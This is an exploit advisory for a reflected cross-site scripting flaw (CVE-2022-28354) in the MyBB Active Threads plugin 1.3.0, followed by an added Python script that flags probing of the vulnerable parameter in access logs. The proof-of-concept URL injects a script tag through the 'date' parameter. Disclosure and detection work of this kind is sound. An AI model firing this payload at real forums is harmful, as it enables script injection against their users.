Authored by 0xB9

MyBB Active Threads plugin version 1.3.0 suffers from a cross-site scripting vulnerability.

advisories | CVE-2022-28354

# Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting
# Date: February 9, 2022
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336
# Version: 1.3.0
# Tested On: Windows 10
# CVE: CVE-2022-28354

Description:
This plugin shows a page of active threads. The date parameter is vulnerable to XSS when a time period is set.

Proof of Concept:
activethreads.php?days=7&hours=0&mins=0&date="><script>alert(1)</script>
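
For defenders checking whether this parameter has been probed on their own forum, the following added example (not part of the original advisory or the plugin's code) scans web access log lines for requests to activethreads.php whose decoded date value contains HTML metacharacters. The combined log format, the function names and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request portion of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that can close an HTML attribute or open a tag once reflected.
HTML_META = re.compile(r'[<>"\']')

# Constructed sample lines using documentation IP ranges, not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Feb/2022:10:00:00 +0000] '
    '"GET /activethreads.php?days=7&hours=0&mins=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Feb/2022:10:00:05 +0000] '
    '"GET /activethreads.php?days=7&hours=0&mins=0'
    '&date=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300',
    '198.51.100.2 - - [09/Feb/2022:10:00:09 +0000] '
    '"GET /showthread.php?tid=4&date=%3Cb%3E HTTP/1.1" 200 900',
]


def flagged_date_values(line):
    """Decoded date= values on activethreads.php that carry HTML metacharacters."""
    match = REQUEST.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # Match the script wherever the forum is installed (/ or a subdirectory).
    if not url.path.endswith("/activethreads.php"):
        return []
    # parse_qs percent-decodes, so %22%3E is compared as "> here.
    values = parse_qs(url.query, keep_blank_values=True).get("date", [])
    return [v for v in values if HTML_META.search(v)]


def scan(lines):
    """Return (client_ip, decoded_value) for every flagged request."""
    hits = []
    for line in lines:
        client = line.split(" ", 1)[0]
        hits.extend((client, v) for v in flagged_date_values(line))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client} date={value!r}")
```

A hit only shows that markup was sent in the parameter; whether it executed depends on the plugin version installed at the time of the request.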